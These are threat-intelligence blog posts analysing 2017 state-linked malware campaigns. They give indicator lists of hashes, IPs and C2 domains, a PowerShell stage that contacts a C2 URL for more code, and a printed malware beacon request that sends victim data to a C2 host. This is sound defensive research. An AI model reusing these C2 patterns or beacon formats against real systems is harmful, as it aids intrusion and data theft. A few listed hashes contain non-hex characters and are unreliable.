Could BadRabbit Ransomware Be Linked To Previously Warned Supply Chain Attack

News has broken on about a new widespread ransomware attack using a new variant called "BadRabbit." At this time it appears that organizations in Russia and Ukraine appear to be the most heavily impacted. Most notably, Russian media outlets and Ukrainian government and critical infrastructure entities are seeing disruptive effects.

Security researchers are already noting similarities between this wave of attacks and the NotPetya attacks that caused widespread disruption back in June 2017, but had a particularly significant effect on entities in Ukraine. While NotPetya initially appeared to be a widespread ransomware attack similar to WannaCry, it was later determined that the malware was a disk wiper with destructive intent rather than a typical financially-motivated ransomware attack. Effects from NotPetya were centered around Ukraine because the initial delivery mechanism was a supply chain attack where malicious actors compromised the update server for software call "M.E.Doc," a widely deployed accounting software used by many organizations in Ukraine as well as businesses with operations there (which explains why effects were felt outside Ukraine).

Read More

DHS Releases Additional Information Regarding Targeted Activity Against Critical Infrastructure

On October 20, 2017 the U.S. Department of Homeland Security released TA17-293A providing significant detail regarding targeted activity against critical infrastructure organization as well as the government. Definitive attribution of this activity is not given; however, the DHS alert does mention that a recent report by Symantec on the actor it calls "Dragonfly" does align with activity described in TA17-293A. Symantec equates Dragonfly to "Energetic Bear" which is a named used by CrowdStrike to describe a Russian adversary that has historically targeted the energy sector.

Although not specifically called out in TA17-293A, this appears to be additional details regarding the same campaign that was widely reported in the media in July. The Cyber Intelligence and Policy Project (CIPP) wrote a blog post related to this activity in July.

Below is a consolidated list of indicators provided by DHS in TA17-293A. CIPP is continuing to conduct analysis to find additional publicly available information that may shed some more light on this campaign.

038a97b4e2f37f34b255f0643e49fc9d

31008de622ca9526f5f4a1dd3f16f4ea

5acc56c93c5ba1318dd2fa9c3509d60b

65a1a73253f04354886f375b59550b46

722154a36f32ba10e98020a8ad758a7a

8341e48a6b91750d99a8295c97fd55d5

99aa0d0eceefce4c0856532181b449b1

a6d36749eebbbc51b552e5803ed1fd58

4383c60926261d467662f95b11efc044

e29d1f5d79cd906f75c88177c7f6168e

04738ca02f59a5cd394998a99fcd9613

3b6c3df08e99b40148548e96cd1ac872

5dbef7bddaf50624e840ccbce2816594

61c909d2f625223db2fb858bbdf42a76

61e2679cd208e0a421adc4940662c583

7dbfa8cbb39192ffe2a930fc5258d4c1

8943e71a8c73b5e343aa9d2e19002373

a07aa521e7cafb360294e56969eda5d6

aa905a3508d9309a93ad5c0ec26ebc9b

aeee996fd3484f28e5cd85fe26b6bdcd

ba756dd64c1147515ba2298b6a760260
 

5.153.58.45
91.183.104.150
67.199.248.10
104.20.219.42
192.81.76.117
187.130.251.249
184.154.150.66
2.229.10.193
41.78.157.34
176.53.11.130
82.222.188.18
130.25.10.158
41.205.61.221
5.150.143.107
193.213.49.115
195.87.199.197
167.114.44.147  
imageliners[.]com
bit[.]ly/2m0x8IH                                                                                                                        tinyurl[.]com/h3sdqck 

 

Recent Report on SYSCON Malware Reveals Overlaps with KONNI Malware Campaigns

Today, Trend Micro released a blog post regarding malware it refers to as "SYSCON" which uses the file transfer protocol (FTP) as a command and control (C2) channel. The blog notes likely targeting of the Red Cross and World Health Organization based on lure documents used to deliver the malware.  The Cyber Intelligence and Policy Project (CIPP) was able to identify significant overlap between what is described in Trend Micro's post and operations referred to in previous public reporting that used the malware known as "KONNI."

Read More

The Potential for Increased Financially-Motivated North Korean Cyber Operations in the Face of Increasing International Pressure

With North Korea becoming increasingly isolated from the world economy the likelihood that it will use its cyber capabilities for financial gain grows. The United Nations has already imposed significant sanctions on North Korea; however, a recent announcement by China that it will shut down North Korean companies operating within its borders could indicate significant financial trouble for North Korea.

Lawfare recently released a podcast of an excellent talk by UC San Diego professor Stephan Haggard that provides a description of the economic pressures that the international community is placing on North Korea. He describes how the US uses access to its financial system as one lever; however, China currently accounts for 90% of North Korea's trade making it the key factor in how severe financial pressure on North Korea can get. With the Chinese recently indicating that they will increasingly restrict North Korean business activity the chances are increasing that North Korea will turn to its cyber capabilities in an attempt to mitigate the effects of financial sanctions.

North Korea has previously shown a desire and ability to conduct financially-motivated cyber operations as evidenced by previous attacks on the Society for Worldwide Interbank Financial Telecommunication (SWIFT) platform. More recently, it has been reported by FireEye that cyber activity linked to North Korea has targeted entities involved with Bitcoin indicating that it may have interest in cryptocurrencies as a way to circumvent sanctions and provide financial assets in the face of these measures.

In this post, the Cyber Intelligence and Policy Project (CIPP) briefly reviews the financially-motivated attacks on the SWIFT system by North Korean actors, and also looks at a couple of malicious files possibly linked to North Korean actors that may have been used in more recent operations targeting cryptocurrencies organizations and more traditional financial systems.

SWIFT Attacks

In February 2016 an attacker gained access to the Bangladesh central bank's SWIFT payment system and set into motion the transfer of a large sum of money from the bank's account to account   in The Philippines. The attackers attempted to steal nearly one billion dollars. The Bangladesh central bank was able put a stop to most of the transfer orders; however, $81 million was never recovered. 

The attackers used a number of tools to gain and maintain access to the bank's systems. Among the toolset used were multiple tools designed specifically to affect SWIFT systems. These tools were capable of collecting information about SWIFT transactions, disabling protection mechanisms present with the SWIFT software, and allow for the alteration of files passed within the system.

In addition to the Bangladesh incident there were a number of other incidents at banks around the world in which SWIFT systems were similarly targeted. Both Kaspersky and BAE noted code level similarities between the malware used in the SWIFT attacks and North Korean actors known as Lazarus.

Recent Financial-themed Attacks Potentially Linked to North Korea

The SWIFT attacks were the first high-profile incidents to highlight financially-motivated attacks linked to North Korean operators. Since that time additional North Korean cyber operations have been observed with possible financial motivations. In researching this post CIPP identified two financially-themed malicious document in open source that may be linked to North Korea.

Bitcoin-themed Incident (08e128a70d1c96ae403fde40e2471389)

This file appears to have been created in late July 2017 and bears the file name 비트코인_지갑주소_및_거래번호.doc (Machine Translation: Bit coin _ wallet address _ and _ transaction number .doc). The Hybrid Analysis platform shows that malicious macro code writes an executable named svchost.exe to the victim machine and then contacts the domain www.unsunozo[.]org for command and control (C2). A Korean language decoy document is also displayed which appears to contain details of a Bitcoin transaction.

Screen Shot 2017-10-01 at 9.29.33 PM.png

The C2 domain in this case is a legitimate site of a South Korean trade union for freight transport workers. It was likely compromised for use in this malicious activity; however, nothing else is known at this time about the nature of the network traffic to this site. CIPP was unable to identify the malware written by the document. 

Financial Institution-themed Incident (9b7efc5b1fce6bbe6e4538b9e38e4aa5)

A search based on code from the previous document revealed a second, similar document likely deployed a couple weeks after. This one also writes an executable to the victim machine and contacts 2 IP address for C2: 176.35.250[.]93 and 64.86.34[.]24. The decoy file in this case is an English language job description for a software developer at a US-based financial institution.

Screen Shot 2017-10-01 at 9.31.06 PM.png

Again, CIPP is not able to identify the malware written by the document.

CIPP cannot confirm these documents are linked to North Korean cyber espionage activity. However, as the previously cited FireEye report indicates, North Korean actors have targeted cryptocurrency entities in South Korea. The Korean language, Bitcoin-themed document described above fits within this reported tactic. The second, English language document shares code with the Bitcoin document. Open source does not indicate this code is widely used so it is possible that the two documents can be linked to the same actor or possibly different actors using similar tooling.

It should also be noted that while decoy content may indicate that these files were used to target the financial sector, CIPP cannot definitively identify targets in these instances.

Conclusion

As North Korea becomes increasingly isolated the probability that it will conduct financially-motivated cyber operations increases. The attacks on the SWIFT platform show that North Korean actors are capable of carrying out successful attacks against traditional financial systems. Cryptocurrencies such as Bitcoin could offer another avenue for North Korea as it attempts to bolster its financial stability in the face of intense international pressure. Current favorable exchange rates as well as uncertain legal and regulatory frameworks could make cryptocurrencies an attractive target for North Korea's cyber operations

 

 

Incident Report: Malicious Document With Bangladesh Theme Possibly Linked to Patchwork Actor

Overview

The Cyber Intelligence and Policy Project (CIPP) has identified a malicious Microsoft Word document possibly linked to the actor publicly known as "Patchwork." VirusTotal indicates that the document carries the file name Bangladesh_Army_News.doc and was created on September 26, 2017. The Hybrid Analysis sandbox indicates that the document contains a malicious macro that uses code to download an executable from the command and control (C2) domain, clep-cn[.]org. CIPP was able to retrieve this executable (202KSL.exe) indicating that the actor responsible is likely still active. 

Hybrid Analysis shows that the document displays content related to the Bangladesh Army. The clep-cn[.]org C2 domain appears to refer to the Chinese Lunar Exploration Program (CLEP). This confluence of Bangladeshi and Chinese indicators suggest that targeting related to this file could center around the current Rohingya refugee crisis occurring in Bangladesh as China's interests are implicated

In July 2016, the security company Cymmetria released a report about a targeted intrusion actor it referred to as "Patchwork." The report speculated a possible pro-Indian actor with an interest in collecting information regarding China's activities. The clep-cn[.]org domain shares a China-focused naming convention similar to those provided in Cymmetria's report; furthermore, a Bangladesh-themed document would be especially appropriate that the current time given China's interest in the Rohingya refugee crisis there. 

Details

Exploit Document:

Retrieved Files:

C2:

  • clep-cn[.]org

Related Infrastructure: 

  • 723863.chinamil[.] info
  • chinamil[.]info
  • ftp.pla-report[.]net
  • militaryreviews[.]net
  • pla-report[.]net
  • sinodefence[.]info
  • www.chinamil[.]info
  • www.militaryreviews[.]net
  • www.pla-report[.]net
  • www.qzonecn[.]com
  • www.sinodefence[.]info

Targeting:

  • China

Related Public Reporting:

  • http://blog.cymmetria.com/research-report-how-we-caught-patchwork-the-copy-paste-apt

Actor/Campaign:

  • Patchwork

Similarities Between CVE-2017-8759 and CVE-2017-0199 Highlight the Possibility of Proliferation of New Exploit

Yesterday, FireEye published a blog post about a new zero-day vulnerability, CVE-2017-8759, in Microsoft's .NET Framework that allows attackers to execute code remotely via a malicious document or application. The only confirmed malicious activity involving this exploit appeared to target a Russian speaking audience with FinSpy malware.

There appear to be a couple of Microsoft RTF documents leveraging CVE-2017-8759 discussed in open source:

As we mentioned in a tweet yesterday FireEye's blog notes similarities between CVE-2017-8759 and CVE-2017-0199 which numerous bad actors have assimilated into their operations since its public disclosure. First, the first known in-the-wild use of both exploits was used to target Russian speaking audiences with FinSpy malware. In addition, the exploit/malware installation chains are similar. While CVE-2017-0199 is a vulnerability in Microsoft Office and CVE-2017-8759 is in the .NET Framework where Office documents are likely to be delivery vectors, both appear to primarily make use of scripts (specifically, HTA scripts) early in the chain in order to download the final payloads.

Given these similarities, it is entirely possible that CVE-2017-8759 will proliferate among bad actors. Within a matter of days, maybe a matter of hours, of CVE-2017-0199's public disclosure multiple criminal and cyber espionage actors started to leverage the exploit in their operations. There's already a GitHub page up incorporating the exploit code into a macro-enabled Word document. Given the nature of this new exploit it could be incorporated into any kind of Office document and possibly into other delivery vehicles as well.

Incident Report: Recent Incident Reportedly Targeting Saudi Arabia With Links To Greenbug and OilRig Actors

Overview

Open source reporting recently indicated new activity from the Iranian actor publicly known as Greenbug targeting Saudi Arabia. The incident used a Microsoft Excel file containing malicious macros which wrote a malicious executable and associated files to the victim machine. The executable in this instance appears to be a variant of a Trojan known as ISMAgent and uses the domain www.ntpupdateserver[.]com for command and control (C2). This domain has been previously reported as an lSMAgent C2.

In July 2017, Palo Alto’s Unit 42 reported observed overlaps between Greenbug and another Iranian actor they call OilRig. The overlap centered around a cyber espionage operation at a Middle Eastern technology organization using tactics associated with OilRig, but leveraging a variant of Greenbug’s lSMDoor malware which Palo Alto named lSMAgent. Additional public reporting on this overlap is not available, but this could indicate that OilRig and Greenbug are one in the same or two different threat groups sharing some of the same tools.

Details

Exploit Document:

  • b518cd2349b490514d1ff1a2a6ec09ec (Macros)

Dropped Files (Directory: /Users/Public/Libraries):

  • B642.txt (9e5ce9b94471f1ba58099857020105a8) 
  • OfficeServicesStatus.vbs (46f4bb9e734c64d71cd8fdc0fc9e6f73) 
  • RecordedTV.library-ms (b6f9aa44c5f0565b5deb761b1926e9b6)
  • servicereset.exe (ad5120454218bb483e0b8467feb3a20f)

C2:

  • www.ntpupdateserver[.]com

Related Infrastructure: 

  • www.adobeproduct[.]com
  • www.cdnmsnupdate[.]com
  • n.n.c.303FF7B225C14F1498A2.cdnmsnupdate[.]com
  • www.microsoft-publisher[.]com

Related Malware:

  • 5a3675ebb6a560a25c6583cae847a41e
  • 66eaef10226fb279dba64bb5948bc85b
  • 89e7e269391b5efc57842c52038485e2

Targeting:

  • Saudi Arabia

OSINT:

  • https://twitter.com/eyalsela/status/906290052141068288

Actor/Campaign:

  • Greenbug; OilRig

Related Public Reporting:

  • https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon
  • https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/
     

Document Indicates U.S. Energy/Critical Infrastructure Campaign May Have Hit Europe in March

 

TARGET COUNTRIES: U.S. (MAY 2017); EUROPE (MARCH 2017) (SUSPECTED)

TARGET SECTOR: ENERGY/CRITICAL INFRASTRUCTURE

TTPS: MALICIOUS DOCUMENTS, STRATEGIC WEB COMPROMISE/WATERING HOLE (POSSIBLE)

There has been significant media attention around a campaign likely by a nation-state actor targeting energy organizations in the U.S. including entities operating nuclear facilities. Although there does not appear to be any direct evidence in the open source at this time, media reports indicated that U.S. government officials have linked the campaign to Russia.

Initial warning appears to have come in the form of a  joint DHS-FBI bulletin at the end of June. This alert is not publicly available, but the team over at Talos released a blog on July 7 that appears to detail at least part of this campaign. The Cyber Intelligence and Policy Project (CIPP) dug into the Talos analysis and discovered a couple unreported items of interest related to this campaign:

  • The actor behind the U.S. operation was likely active at least as far back as March 2017 possibly targeting similar Energy/Critical Infrastructure entities in Europe.
  • Indicators that may be related to the “watering hole” element of this campaign. 

Malicious Document Deployed in March 2017

This all begins with the three IP addresses provided at the end of the Talos blog post:

  • 184[.]154[.]150[.]66
  • 5[.]153[.]58[.]45
  • 62[.]8[.]193[.]206

Googling the 184[.]154[.]150[.]66 reveals a very interesting file (MD5: 3c432a21cfd05f976af8c47a007928f7) submitted to the Hybrid Analysis platform on July 10, 2017. The file name “Report03-23-2017.docx” suggests that this document may date back to March. A look at publicly available information in VirusTotal for this file supports a March deployment timeframe as it shows a ZipModifyDate of March 24, 2017 and shows that the file was first submitted to the platform on that same day.

Analysis of this document reveals that it is extremely similar to those reported in the Talos blog. Most notably, the March document contained the same template injection code reported by Talos.

                                                                             Template Injection Code from March 2017 Document

                            Template Injection Code from Document Analyzed by Talos Related to Recent U.S. Campaign

As the screenshots show, both contain the same unique “rId1337” Relationship ID and both use the same [remote IP address]/[*.dotm] URL target format. Furthermore, the March document contains the 184[.]154[.]150[.]66 IP address that Talos links to the U.S. campaign.

The decoy displayed by the March document may shed some light on the general nature of its intended targets.

                                                                                           March Document Decoy Content

The content refers to the “Donegal 110Kv Project.” Open source information shows that this is the name of a project for installing overhead power lines in Ireland suggesting a possible target or targets in that country or more broadly within Europe. A recent Bloomberg article hinted that critical infrastructure targets in Europe may have also been affected by this campaign strengthens this possibility. This is bolstered by recent statements from employees at FireEye that the actor behind this campaign targeted organizations in Europe and the Middle East, specifically Ireland and Turkey.

Indicators Possibly Related to Watering Hole Activity?

In addition to the March document, open source analysis of the 184[.]154[.]150[.]66 and 5[.]153[.]58[.]45 IP addresses provided in the Talos blog post reveals what could be indicators of reported strategic web compromise or "watering hole" activity used in this campaign.

As the screenshots above show, 184[.]154[.]150[.]66 and 5[.]153[.]58[.]45 have not only .dotm files linked to them, but also .png files, and, in one instance, a JavaScript file. The Talos post only mentions the malicious documents as containing .dotm-related URLs with no mention of image or JavaScript files. If the .png and .jspa files are not linked to use of malicious documents, it is possible that they are linked to the “watering hole” element of this campaign which was very briefly mentioned in the media. CIPP was unable to obtain any of these files and their purpose remains unknown. 

Conclusion

There is still a lot that is unknown about this campaign. U.S. government officials have gone on the record pointing the finger at a Russian actor, but there is no publicly available information that provides clear overlap to a known group. What does appear to be clear is that the actor responsible for the U.S.-focused campaign reported on in the Talos blog post was active in March 2017 possibly targeting similar organizations in Europe.
 

NATO-Themed Word Document Containing Malicious Macros

 

TARGET: NATO OR NATO-ASSOCIATED ORGANIZATIONS (SUSPECTED)

TOOLS: WORD DOCUMENT WITH MALICIOUS MACROS

On March 17, 2017 the Cyber Intelligence and Policy Project (CIPP) noticed an interesting Microsoft Word file pop up over at Payload Security's Hybrid Analysis site. The file (MD5: f5eccbe4b4cae9be19751eaf0bb8ceaf) bore a name of CAG-Meeting 21-22 MAR 2017-Calling Notice-FINAL.doc. Some brief analysis reveals that this document contains a malicious macro along with a decoy concerning an upcoming meeting of the North Atlantic Treaty Organization's (NATO) with reference to its Defence Planning Process which is a mechanism for NATO members to "harmonize their national defense plans with those of NATO."

                                                   Screenshot Of NATO-Themed Decoy

The malicious macro code is stored in two different streams: ThisDocument.cls and Module1.bas. The first contains Base64-encoded data and the second appears to act as a decoder for that data. The code for Module1.bas was taken from GitHub-hosted module meant to encode and decode Base64 data. 

                                                                                                          ThisDocument.cls

                                                                                                              Module1.bas

Together these macros decode data and write it to two files: MicrosoftProfile.vbs and MSOffice.ps1. The VBScript file simply executes the PowerShell file which contains code to contact a command and control (C2) at http://193.29.187.194:1011/new/$u in which the value "$u" is replaced with the victim's username appended with four digits.

                         VBScript and PowerShell Written to Victim

                            PowerShell Code Showing IP Address

The "DownloadData" string indicates the the code attempts to retrieve additional data from the C2 server, possibly additional malicious code. CIPP attempted to retrieve this second-stage data, but was unsuccessful. It is possible that the actor is using the usernames in the URLs to filter for victims of interest.

This certainly appears to be a targeted incident; however, it is unclear who is behind it. Russia's use of cyber espionage targeting NATO has been well-documented. This incident leaves little to go on. The IP address is not publicly linked to any known cyber espionage activity and the code used in this document shows no clear overlaps with known activity either.

Vipers, Falcons, and Droids: Apparent Link Between Arid Viper/Desert Falcons and Recent Android Malware Targeting Israeli Military

 

TARGET COUNTRY: ISRAEL

TARGET SECTOR: MILITARY

TOOLS: ANDROID MALWARE, UNIDENTIFIED PC MALWARE

On February 16, 2017, Kaspersky Labs released a blog post detailing a campaign using malware for the Android operating system to target members of the Israeli Defense Force (IDF). Although they don’t explicitly mention it, the activity described in Kaspersky’s post seems similar to activity reported in January 2017. Both Kaspersky and the January reports indicated that IDF soldiers were being targeted with Android malware via social engineering tactics using sexual themes coming from Facebook. The reports from January explicitly linked the campaign to Hamas.

The Cyber Intelligence and Analysis Project (CIPP) dug into the information that Kaspersky released in its blog post. None of the Android malware samples listed in the blog post appear to be available in free, public repositories; however, CIPP was able to pivot off of an email address used to register one of the reported command and control (C2) domains and, using open source tools and free services, identify additional network infrastructure and malware likely linked to the actors carrying out the Android malware campaign.

The additional malware identified by CIPP provides a link between the recent Android campaign targeting IDF soldiers and activity described by Trend Micro and Kaspersky from February 2015 in their Arid Viper and Desert Falcons reports.  

Registrant Email: info[@]palgoal[.]ps

Kaspersky reported five command and control (C2) domains related to the Android malware campaign it's been tracking:

  • androidbak[.]com
  • droidback[.]com
  • endpointup[.]com
  • siteanalysto[.]com
  • goodydaddy[.]com

The androidbak[.]com was registered using the email address info[@]palgoal[.]ps. 

As the screenshot above shows, androidbak[.]com was registered using information from an organization located in Gaza. This lines up nicely with Kaspersky's reporting saying that the Android malware campaign targeted IDF soldiers serving in Gaza. This registrant email address is actually an interesting case. Often, malicious actors will register their infrastructure under fake email addresses they’ve made up for that purpose. That doesn’t appear to be the case here. The palgoal[.]ps domain actually belongs to an apparently legitimate, Gaza-based web hosting and IT company, PalGoal. As will be discussed below, the email has registered multiple domains linked to malicious activity; however, there are no indications at this point that PalGoal is knowingly involved in malicious activity. It is possible that bad actors are merely leveraging PalGoal’s services for their operations. 

DomainTools shows 25 domains have been registered with the info[@]palgoal[.]ps email. Without a paid subscription, DomainTools won’t reveal what specific domains have been registered using that email. However, there’s a very useful free service called ThreatCrowd (https://www.threatcrowd.org/) which will often have this kind of information, and, in this instance, it does.

There are five suspicious domains highlighted in the screenshot above. The Kaspersky blog post confirms that the androidbak[.]com domain is known to be malicious. There are also three other Android-related domains registered using info[@]palgoal[.]ps which use a similar naming convention and are worth checking out. In addition, the dooownloads[.]com appears suspicious as well and deserves some investigation.

Discovering Older Malware Linked To This Campaign

A Google search for the dooownloads[.]com domain reveals that it appeared in a malware file submission to the free malware analysis platform, Malwr, back in October 2015. 

The dumped strings from this file show that dooownloads[.]com is hardcoded into the malware along with another domain, audioodrivers[.]com. Additionally, there appears to be another unique string related to the file's User Agent, "User-Agent: AudioDrive.” A Google search for this string shows that it appears in handful of other files submitted to various online malware analysis tools.

CCP was able to gather some basic information about these files including some file names and C2 domains:                                                          

                                                                                    Table 1. List of Files with "User-Agent: AudioDrive" String

Available information shows that all of these files make the same initial GET request to their C2 server:

GET /XSounds/sound_q.php?p=[victim machine data]—[unique identifier] HTTP/1.1
Accept: text/*
User-Agent: AudioDrive
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
REMOTE_USER: user
Host: oowdesign[.]com
Cache-Control: no-cache

The Colombia File

Among the malware files listed above is one with a rather interesting name, “helicoptero_en_Colombia.scr.” Given that the operator of the campaign being investigated appears to be focused on Israeli targets it is odd to see a related file with a Spanish language file name. 

               Decoy Video from helicoptero_en_Colombia.mp4

              Decoy Video from helicoptero_en_Colombia.mp4

Analysis of this file (MD5: 1d9ee9c96818ae46a2fee623b4f8e75c) reveals that it is a self-extracting archive (SFX) containing two files: VLC.exe and helicoptero_en_Colombia.mp4. The executable file is the malware. It connects to the C2 domain mentioned above, oowdesign[.]com, and has a compile date of September 14, 2015. 

While the malware is installed on the victim computer the mp4 file is played as a decoy to trick the victim into believing it is a legitimate file. As the file name would suggest, the decoy is a video of a Spanish language news broadcast regarding an August 2015 crash of a Blackhawk helicopter during an operation against the neo-paramilitary group, Los Urabeños. With the crash occurring in early August and the malware being compiled in mid-September 2015 it appears that the malware operator was attempting to use a relatively recent event in order to entice potential targets into opening the file.

Link Back To The Arid Viper Campaign

In addition to other malicious files, the previous screenshot of the Google search for the AudioDrive User Agent string shows a link to a blog written by the cybersecurity company Proofpoint in September 2015. The blog mentions the C2 domain identified above, oowdesign[.]com, and describes malware with the same behavior as the malware samples listed in Table 1. 

The Proofpoint blog expands on research done by Trend Micro about a campaign it dubbed “Operation Arid Viper” which it said exclusively targeted victims in Israel. At almost the same time Trend Micro released the Arid Viper report, Kaspersky released its own report on the same activity but referred to it as “Desert Falcons.” The Arid Viper and Desert Falcons reports detail campaigns with the same targeting and general tactics, techniques, and procedures (TTPs) as the recently identified Android malware campaign hitting IDF soldiers. Additionally the reports from Arid Viper and Desert Falcons describe malware that behaves very similarly to the older malware samples CCP identified above.

Additional Android Malware Sample

CCP discovered one final malware sample of note. A search of the malware analysis platform VirusTotal for the domain fastdroidmob[.]com shows it is linked to a malicious file.

Remember, the fastdroidmob[.]com domain was registered using the info[@]palgoal[.]ps which registered domains linked both to the recent Android malware campaign described by Kaspersky and the older malware CCP identified. VirusTotal analysis of the file linked to fastdroidmob[.]com shows it to be malware targeting the Android platform and was submitted in June 2016. Interestingly, Kaspersky's blog post stated that the campaign it described began around July 2016 so the June 2016 submission of the fastdroidmob[.]com file would predate that timeframe.

It's not clear whether the fastdroidmob[.]com is the same malware Kaspersky describes in its blog post, but there is a notable overlap here.

Assessment

While there is no smoking gun, the following factors suggest that the Android malware campaign described by Kaspersky in its recent blog post is linked to the Arid Viper/Desert Falcons campaign:

  • The info[@]palgoal[.]ps was used to register C2 infrastructure for the recent Android campaign as well as C2 infrastructure for the 2015 malware samples identified by CCP.
  • The 2015 malware samples behave consistently with those described in the Arid Viper/Desert Falcons reports.
  • That malware appears to be in limited use by only one entity, and not shared amongst multiple threat actors.
  • The Israel-focused targeting and general TTPs suggest that the recent Android campaign, the older CCP-identified malware, and the Arid Viper/Desert Falcons are linked together.

The file with the Spanish-language filename and Colombia-related decoy video still stands as somewhat of an outlier when considering the focus on Israeli targets by this activity. Kaspersky’s Desert Falcons report actually indicates a much larger target scope for this adversary with targets in numerous sectors located in nearly 50 countries; however, none of the countries included in that list are Spanish speaking. It is possible that the Spanish language decoy was meant to target Spanish-speaking individuals in non-Spanish-speaking countries or that it was used for some unknown reason. 

Malicious Files

b8237782486a26d5397b75eeea7354a777bff63a                 09c3af7b0a6957d5c7c80f67ab3b9cd8bef88813                 9b923303f580c999f0fdc25cad600dd3550fe4e0                   0b58c883efe44ff010fl703db00c9ff4645b59df                     0a5dc47b06de545d8236d70efee801ca573115e7             782a0e5208c3d9e8942b928857a24183655e7470           5f71a8a50964dae688404ce8b3fbd83d6e36e5cd            03b404c8f4ead4aa3970b26eeeb268c594blbb47

Domains

androidbak[.]com
droidback[.]com
endpointup[.]com
siteanalysto[.]com
goodydaddy[.]com                                                                                                                               oowdesign[.]com
audioodrivers[.]com
androidmobgate[.]com
dooownloads[.]com
droidcart[.]com
fastdroidmob[.]com 

A Case For Including Disruptive Cyber Operations Under IHL

A recent paper in the Michigan Telecommunications and Technology Law Review covered a topic that is extremely relevant right now. The paper argues that “disruptive” cyber operations are a new form of violence that should be adopted into the more traditional view of “attack” under international humanitarian law (IHL). It draws attention to a current debate over whether a cyber operation must result in physical damage, injury, or death to a civilian population in order to be considered an attack. It’s widely considered that a cyber operation that does result in such kinetic effects is an attack under IHL resulting in the application of IHL’s principles of distinction and proportionality. However, it is unclear whether operations that only cause interruptions to the functionality of a system, or “disruptive” operations, without kinetic effect should fall into the category of attacks.

Kilovaty’s paper uses the December 2015 operations against Ukraine’s power grid that resulted in widespread power outages as a real world example to illustrate his point that “cyber operations that do not result in direct kinetic effects such as death, injury, or physical destruction” are considered by many not to qualify as attacks and therefore do not trigger IHL considerations. The reason Kilovaty’s paper is extremely relevant right now is that there are actually a couple of much more recent campaigns with similar effects that further illustrate this point.

Since November 2016, there has been an unusually high frequency of destructive/disruptive cyber operations against government and critical infrastructure targets in Saudi Arabia and Ukraine suspected to be carried out by nation-state actors in Iran and Russia. They began around mid-November 2016 when reports emerged that destructive malware crippled the networks of government organizations and the agency responsible for running airports in Saudi Arabia. That initial round of incidents was followed up by a second at the end of November and a third in late January 2017. This final wave reportedly hit a wide array of government and private sector organizations in Saudi Arabia. Analysis of the malware used revealed it to be a new version of the Shamoon (or Disttrack) malware used in a 2012 cyber attack against a company in Saudi Arabia believed to have been carried out by operators Iran. While there has been no definitive attribution made with respect to the recent incidents, the similarity in malware and targeting are indicative of an Iranian actor.

During this same late 2016, early 2017 timeframe a different wave of operations unrelated to those in Saudi Arabia occurred in Ukraine. On December 6 Ukraine’s Ministry of Finance announced that it was the victim of a “coordinated cyber attack” that destroyed data and blocked access to its network. Media reports indicated that the treasury service and pension fund were also affected which resulted in pension and other government payments being blocked. In addition to the incidents against these financial agencies, there was also a suspected operations against the Ukrainian power company, Ukrenergo (http://www.reuters.com/article/us-ukraine-cyber-attack-energy-idUSKBN1521BA), which resulted in blackouts in Kiev.

Analysis of the malware and tactics used in these operations revealed them to be similar to those used in the previously mentioned December 2015 attack that left hundreds of thousands without electricity in western Ukraine. Although never definitively tied to the Russian government, the choice of target and sophistication of the operations point to a Russian actor.

Because of the types of malware used in the attacks described above, it seems possible that they would be considered attacks under current IHL because the destructive malware used may have rendered affected systems so inoperable that it resulted in the need to replace physical computers or components. That is a type of physical damage that would meet the current definition of “attack”; however, it’s unclear whether physical replacement was necessary. If it wasn’t necessary and malware was used to interfere with the victim systems without physical damage then these incidents may not be considered attacks under IHL just disruptive operations.

The conclusion that these incidents would not be considered attacks because they didn’t result in the need to physically replace affected systems and therefore IHL principles should not apply seems absurd. The 2015 operation against Ukraine’s electrical grid is a good example. Assume that the bad guys only used access to manipulate controls to shut off the power and didn’t use malware that had a destructive effect. The incident knocked out power to thousands of people in late December. Shutting of the power in late December in an area where it can get pretty cold could easily result in civilian casualties. While there don’t appear to be any reported injuries or deaths resulting from the outage why should that be the measuring stick? Someone has to get hurt or die before it is considered an attack? Other, non-weather-related casualties could also result if power is lost. However, under the rule that physical damage to property or civilian injury/death is necessary to label a cyber operation an attack would mean that the 2015 Ukraine incident would not be considered an attack unless the malware used had a destructive effect.

Including disruptive cyber operations against critical systems under the current “attack” umbrella would bring IHL’s principles of distinction and proportionality into play. This would require those launching disruptive operations to understand the nature of the systems being targeted. If attacking a particular system would result in widespread, indiscriminate damage it cannot go forward. Application of IHL to disruptive operations would result in more of a burden on the operators which many governments may be opposed to; however, to not provide IHL protections to disruptive operations targeting systems critical to civilian populations seems to undermine IHL’s humanitarian goal.

Gentlemen's Agreement: Chinese And Russian Hacking In Wake of 2015 Cyber Pact

Yesterday, the Council on Foreign Relations published a blog regarding a public report from Qihoo, a Chinese cybersecurity company, that mentioned the targeting of China by the Russia-based hacker group known as APT28/FANCY BEAR. CFR drew attention to this because APT28 operations targeting Russia could be in violation of a 2015 agreement between Russia and China in which the two countries agreed not to engage in "computer attacks" or other cyber operations that might result in "misuse" or "unsanctioned interference" with the other country's "information resources." 

CFR's blog post points out that the ambiguity in the terms of the Russia-China agreement allow for a broad range of interpretation which leaves room for the two countries to engage in cyber operations against the other without violating the agreement. In particular, the "misuse" and "interference" terms leave a significant amount of room for interpretation.

Even if APT28 has been hacking China, it is not only the Russians that may have carried out such operations in the wake of the agreement. Cyber espionage activity targeting Russia and linked to Chinese actors occurred at a significant pace after the agreement was reached in April 2015. The cybersecurity company Proofpoint published a couple of blog posts (here and here) detailing a long running campaign from a group they refer to as TA459 targeting Russian organizations in the military and telecommunications sectors. This campaign involved the use of a number of malware families (PlugX, NetTraveler, and Saker) historically linked to Chinese operators. 

In the end, it is unlikely that Russia and China would find the actions of APT28 or TA459 to be in violation of the April 2015 agreement. This is because, at least in TA459’s case, the activity appears to be more traditional espionage rather than computer attacks or intrusions aimed at providing commercial advantage to the perpetrator. The Russia-China agreement doesn’t mention cyber espionage aimed at providing commercial advantage, but such activity may be more likely to be viewed as a violation. In fact, commercial cyber espionage was the crux of the agreement between the US and China a few months later. While there was also some ambiguity in the US-China agreement as to how a commercial motive was to be determined, like the Russia-China pact, it contained no language that would preclude traditional cyber espionage.

